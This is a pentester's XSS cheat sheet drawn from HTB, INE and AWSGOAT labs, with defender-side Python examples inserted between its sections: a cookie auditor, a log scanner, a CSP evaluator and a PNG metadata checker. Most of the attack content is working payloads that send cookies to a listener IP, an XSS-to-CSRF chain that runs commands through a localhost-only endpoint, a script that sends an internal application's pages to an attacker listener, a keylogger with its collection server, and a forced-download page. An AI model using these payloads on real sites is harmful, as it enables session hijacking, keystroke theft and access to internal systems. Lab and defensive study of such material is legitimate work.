Cookie Stealing-
(Note: the cookie must not carry the HttpOnly flag; document.cookie cannot read HttpOnly cookies.)
1. Classic way-
<script>var i=new Image(); i.src="http://10.10.14.8/?cookie="+btoa(document.cookie);</script>
Here the btoa() method converts the cookie string into a base64-encoded string.
python3 -m http.server 80
Bypassing Secure flag protection-
a) Creating an HTTPS server-
openssl req -new -x509 -keyout localhost.pem -out localhost.pem -days 365 -nodes
Generating certificate.
#!/usr/bin/python3
import http.server
import ssl

# Serve the current directory over HTTPS on all interfaces
server_address = ('0.0.0.0', 443)
httpd = http.server.HTTPServer(server_address, http.server.SimpleHTTPRequestHandler)
# ssl.wrap_socket() was removed in Python 3.12; use an SSLContext instead
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(certfile='localhost.pem')  # cert + key generated by the openssl command above
httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()
Starting web server.
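Defender-side check (an added example, not part of these notes): a small parser that audits Set-Cookie headers for the HttpOnly, Secure and SameSite attributes, which are exactly the flags that decide whether the payloads above can read the cookie from document.cookie or replay it. The header values in SAMPLE_HEADERS are constructed for the example.

```python
"""Audit Set-Cookie headers for the attributes that limit what an XSS
payload can do with a cookie. Constructed sample headers; no network."""

from dataclasses import dataclass, field
from typing import Dict, List, Optional


@dataclass
class CookieAudit:
    name: str
    http_only: bool
    secure: bool
    same_site: Optional[str]
    findings: List[str] = field(default_factory=list)


def parse_set_cookie(header: str) -> CookieAudit:
    """Parse one Set-Cookie header value: "name=value; Attr; Attr=val"."""
    parts = [p.strip() for p in header.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()  # flag attributes map to ""
    same_site = attrs.get("samesite")
    audit = CookieAudit(
        name=name,
        http_only="httponly" in attrs,
        secure="secure" in attrs,
        same_site=same_site if same_site else None,
    )
    if not audit.http_only:
        audit.findings.append(
            "no HttpOnly: readable from document.cookie, so an XSS payload can exfiltrate it")
    if not audit.secure:
        audit.findings.append(
            "no Secure: the browser will also send it over plaintext HTTP")
    if audit.same_site is None or audit.same_site.lower() == "none":
        audit.findings.append(
            "no SameSite (or SameSite=None): attached to cross-site requests")
    return audit


def audit_headers(headers: List[str]) -> Dict[str, List[str]]:
    """Map each cookie name to its list of findings (empty list = all flags set)."""
    return {a.name: a.findings for a in map(parse_set_cookie, headers)}


# Constructed sample headers
SAMPLE_HEADERS = [
    "PHPSESSID=abc123; Path=/",
    "csrftoken=xyz; Secure; SameSite=Lax; Path=/",
    "session=def456; HttpOnly; Secure; SameSite=Strict; Path=/",
]

if __name__ == "__main__":
    for cookie, findings in audit_headers(SAMPLE_HEADERS).items():
        print(cookie, "->", findings or "ok")
```

In the sample, PHPSESSID gets all three findings, csrftoken only the HttpOnly one, and the session cookie passes. A cookie that passes this audit is still not safe against XSS in general (the script can act on the user's behalf from inside the page), but it cannot be read by the Image/XHR/fetch payloads in this section.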
2. Via XHR-
var xhr=new XMLHttpRequest();
xhr.open("GET", "https://10.10.14.8/?"+document.cookie, true);
xhr.send();
3. Fetch API-
Redirecting User to malicious websites-
<script>window.location.replace("http://evil.com");</script>
Accessing internal application/Bypassing localhost restrictions-
Suppose some functionality in the web app can be accessed only from the local server. If the XSS fires while an Administrator user is browsing the vulnerable web app logged in, it is possible to reach that internal functionality by chaining XSS with CSRF: the injected script issues an XHR request from the admin's browser, which runs on the server.
Scenario 1:
Sample source code:
if($_SERVER['REMOTE_ADDR'] == "::1")
{
system($_POST['cmd']);
} else
{
echo "It's only allowed to access this function from localhost (::1).<br> This is due to the recent hack attempts on our server.";
}
XHR request js file-
var http = new XMLHttpRequest();
var url = 'http://127.0.0.1/admin/backdoorchecker.php';
// The PHP above reads $_POST['cmd'], so the form field must be named cmd; the value is URL-encoded for the form body
var params = 'cmd=' + encodeURIComponent('dir | ping -n 5 10.10.14.8');
http.open('POST', url, true);
http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
http.withCredentials = true; // send the admin's session cookie along with the request
http.send(params);
<script src=http://10.10.14.8:80/robme.js></script>
Scenario 2: Stacked.htb
The Referer HTTP header is vulnerable to XSS.
Our XSS fires in another application hosted on the domain mail.stacked.htb, which is not reachable from the external network.
To access it we use the simple JavaScript below in our XSS payload:
//apni.js
var url = "http://mail.stacked.htb/"; // target URL (internal web application)
var xhr = new XMLHttpRequest();
xhr.open("GET", url, false); // synchronous, so responseText is ready right after send()
xhr.send();
var resp = xhr.responseText;
// Transfer the HTTP response to our listener
var xhr2 = new XMLHttpRequest();
xhr2.open("POST", 'http://10.10.14.89:443/', false);
xhr2.send(resp);
XSS payload-
<script src="http://10.10.14.89/apni.js"></script>
We start a netcat listener to capture the response of our XHR.
We can save the captured response as an HTML file and open it in a browser to view the application.
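Detection for both scenarios above (an added example, not from the original notes or the HTB machines): a scanner over combined-format access log lines that percent-decodes the request target and the Referer header and flags XSS markers such as <script, <img or on*= handlers. The Referer check corresponds to the Stacked scenario, the query-string check to payloads injected through parameters. The log lines, the TEST-NET addresses and the XSS_RE marker set are all constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Apache/nginx "combined" log format (constructed sample lines below)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Markers typical of reflected/stored XSS payloads (the example's own set; tune for your app)
XSS_RE = re.compile(
    r"<\s*(script|img|svg|iframe|body)\b|javascript:|\bon[a-z]+\s*=",
    re.IGNORECASE,
)

# Constructed sample log: an encoded img/onerror payload in the query string,
# a script include injected via Referer, and one benign request.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?name=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /contact.php HTTP/1.1" 200 512 "<script src=http://203.0.113.9/apni.js></script>" "Mozilla/5.0"',
    '198.51.100.5 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?name=alice HTTP/1.1" 200 512 "http://app.example.test/" "Mozilla/5.0"',
]


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded payloads are caught too."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_log(lines):
    """Return one finding per (line, field) where an XSS marker appears after decoding."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; in production, count these separately
        for field in ("target", "referer"):
            decoded = fully_decode(m.group(field))
            hit = XSS_RE.search(decoded)
            if hit:
                findings.append({
                    "ip": m.group("ip"),
                    "ts": m.group("ts"),
                    "field": field,
                    "marker": hit.group(0),
                    "value": decoded,
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['field']}: {f['marker']!r} in {f['value']}")
```

Run against the sample it reports the img/onerror payload in the query string of the first line and the script tag in the Referer of the second, and nothing for the benign request. Because the Referer is attacker-controlled and lands in the log verbatim, this is also the field to watch when an application reflects it, as in Scenario 2.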
Keylogger
This payload was used while solving AWSGOAT module 1.
<img src='a' onerror="
document.onkeypress = function(evt) {
evt = evt || window.event;
const key = String.fromCharCode(evt.charCode);
if (key) {
fetch('https://<YOUR-LISTENER-DOMAIN>/?key=' + encodeURIComponent(key), {method: 'GET', mode: 'no-cors'})
.catch(err => console.error('Error:', err));
}
};
alert('xss');
">
And we create a listener server as well:
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

# File the keystrokes are appended to
LOG_FILE = "keystrokes.log"
PORT = 8000


class KeystrokeLoggerHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Parse the query string of the incoming request
        query_components = parse_qs(urlparse(self.path).query)
        # parse_qs already percent-decodes, so no second unquote() is needed
        key = query_components.get('key', [''])[0]
        # Log the key to the console
        print(f"Keystroke received: {key}")
        # Append the key to the file
        with open(LOG_FILE, "a") as f:
            f.write(key + "\n")
        # Respond with a 200 OK
        self.send_response(200)
        self.end_headers()


# Start the server on all interfaces
server_address = ('', PORT)
httpd = HTTPServer(server_address, KeystrokeLoggerHandler)
print(f"Keystroke logger server is running on port {PORT} and logging to {LOG_FILE}...")
httpd.serve_forever()
Then I also used nginx to turn it into HTTPS.
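Mitigation view (an added example, not part of the original notes): a simplified Content-Security-Policy evaluator that, given a policy and the kind of request a payload triggers, reports whether the browser would block it. It covers the image beacon, the external script include, the XHR/fetch exfiltration and the keylogger fetch from the earlier sections. The policy, page origin and request URLs are constructed; the source-matching model supports 'self', 'none', '*', scheme sources and exact origins only (no host wildcards, paths, nonces or hashes), which is a simplification of the example and not a full CSP implementation.

```python
from urllib.parse import urlsplit

# Which CSP directive the browser consults for each kind of request; all of
# these fall back to default-src when the specific directive is absent.
DIRECTIVE_FOR = {
    "image": "img-src",        # <img src=...> beacons
    "script": "script-src",    # <script src=...> includes
    "connect": "connect-src",  # XMLHttpRequest / fetch calls
}


def parse_csp(policy):
    """'default-src 'self'; img-src 'self' https:' -> {directive: [sources]}"""
    directives = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = [t.lower() for t in tokens[1:]]
    return directives


def origin_of(url):
    """scheme://host[:port] of a URL (explicit ports only; default ports are not folded)."""
    u = urlsplit(url)
    port = f":{u.port}" if u.port else ""
    return f"{u.scheme.lower()}://{u.hostname}{port}"


def request_allowed(policy, kind, request_url, page_origin):
    """Simplified source matching: 'self', 'none', '*', scheme sources (https:)
    and exact origins. Returns True when the request would be allowed."""
    directives = parse_csp(policy)
    sources = directives.get(DIRECTIVE_FOR[kind], directives.get("default-src"))
    if sources is None:
        return True  # nothing applies: CSP does not restrict this request
    target = origin_of(request_url)
    scheme = urlsplit(request_url).scheme.lower() + ":"
    for src in sources:
        if src == "'none'":
            return False
        if src == "*":
            return True
        if src == "'self'" and target == page_origin.lower():
            return True
        if src.endswith(":") and src == scheme:
            return True
        if not src.startswith("'") and src == target:
            return True
    return False


# Constructed policy and page origin for the demonstration
PAGE_ORIGIN = "https://app.example.test"
POLICY = "default-src 'self'; script-src 'self' https://cdn.example.test; img-src 'self' https:"

# The request each earlier payload class would trigger (constructed URLs, TEST-NET addresses)
PAYLOAD_REQUESTS = {
    "image beacon over http": ("image", "http://203.0.113.8/?cookie=..."),
    "image beacon over https": ("image", "https://203.0.113.8/?cookie=..."),
    "external script": ("script", "http://203.0.113.8/robme.js"),
    "xhr/fetch exfil": ("connect", "https://203.0.113.8/"),
    "keylogger fetch": ("connect", "https://listener.example.test/?key=a"),
}


def evaluate(policy=POLICY, page_origin=PAGE_ORIGIN):
    """Map each payload label to True (allowed) or False (blocked by the policy)."""
    return {label: request_allowed(policy, kind, url, page_origin)
            for label, (kind, url) in PAYLOAD_REQUESTS.items()}


if __name__ == "__main__":
    for label, allowed in evaluate().items():
        print(f"{label:26s} {'ALLOWED' if allowed else 'blocked'}")
```

Two things worth noticing in the output: a scheme-wide source such as https: in img-src still lets an HTTPS image beacon through (the Secure-flag workaround above is exactly that), and CSP fetch directives say nothing about window.location redirects, which are navigations rather than resource loads.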
DOM XSS
INE: WebApp Labs Web Application attacks LAB 30
window.onload = function() {
    var site = document.location.href;
    var index = site.indexOf("=", 0);
    name = "";
    if (index != -1) {
        name = site.substr(index + 1);
    }
    name = decodeURIComponent(name);
    document.getElementById('name').innerHTML = name; // sink: URL-controlled string written as HTML
}
Payload:
<img src='lol' onerror="alert(1)">
XSS via file uploads:
Note: the scenario below is from the Meta HTB machine.
exiftool -Comment='<H1>Hello</H1>' Untitled.png
Verified HTML injection.
For XSS we can try the below payload:
<img src=x onerror=alert(document.domain)>
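Defender-side check for the upload scenario (an added example, not from the notes or the Meta machine): a PNG chunk parser that extracts tEXt/zTXt/iTXt metadata and flags values containing HTML tags before the application renders them. build_sample_png() constructs a 1x1 image with a Comment text chunk, which is what the exiftool -Comment command above writes into a PNG (an assumption of the example); HTML_RE is the example's own marker regex.

```python
import re
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Anything that looks like an opening or closing HTML tag
HTML_RE = re.compile(r"<\s*/?\s*[a-z][a-z0-9]*", re.IGNORECASE)


def _chunk(ctype, data):
    """Encode one PNG chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_sample_png(comment):
    """Constructed 1x1 greyscale PNG carrying a tEXt chunk keyed 'Comment'
    (assumed to match what exiftool -Comment=... produces for a PNG)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # 1x1, 8-bit grey
    idat = zlib.compress(b"\x00\x00")  # one scanline: filter byte + one pixel
    text = b"Comment\x00" + comment.encode("latin-1")
    return (PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"tEXt", text)
            + _chunk(b"IDAT", idat) + _chunk(b"IEND", b""))


def png_text_chunks(data):
    """Return [(keyword, text)] for every tEXt, zTXt and iTXt chunk in the file."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    out = []
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        pos += 12 + length  # length + type + data + crc
        if ctype == b"tEXt":
            key, _, text = body.partition(b"\x00")
            out.append((key.decode("latin-1"), text.decode("latin-1")))
        elif ctype == b"zTXt":
            key, _, rest = body.partition(b"\x00")  # rest = method byte + zlib data
            out.append((key.decode("latin-1"), zlib.decompress(rest[1:]).decode("latin-1")))
        elif ctype == b"iTXt":
            key, _, rest = body.partition(b"\x00")
            comp_flag = rest[0]  # rest[1] is the compression method
            _lang, _, rest = rest[2:].partition(b"\x00")
            _translated, _, text = rest.partition(b"\x00")
            if comp_flag == 1:
                text = zlib.decompress(text)
            out.append((key.decode("latin-1"), text.decode("utf-8", "replace")))
        elif ctype == b"IEND":
            break
    return out


def html_in_metadata(data):
    """Metadata entries that contain HTML markup and must not be rendered raw."""
    return [(k, t) for k, t in png_text_chunks(data) if HTML_RE.search(t)]


if __name__ == "__main__":
    sample = build_sample_png("<H1>Hello</H1>")
    print(html_in_metadata(sample))       # [('Comment', '<H1>Hello</H1>')]
    print(html_in_metadata(build_sample_png("holiday photo")))  # []
```

The same check belongs wherever an upload handler copies metadata (comments, titles, EXIF descriptions) into a page; the fix on the rendering side is to HTML-encode those values rather than to reject uploads, since a filter on tag names is easy to slip past.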
HTML Injection:
<html>
<body>
<script>
// Forces a download in the victim's browser by clicking a synthetic <a download> link
function downloadFile(url, filename)
{
  const anchorElement = document.createElement('a');
  anchorElement.href = url;
  anchorElement.download = filename;
  document.body.appendChild(anchorElement);
  anchorElement.click();
  document.body.removeChild(anchorElement);
}
const fileUrl = '<URL for the file>';
const fileName = '<file name for saving on victim end>';
downloadFile(fileUrl, fileName);
</script>
</body>
</html>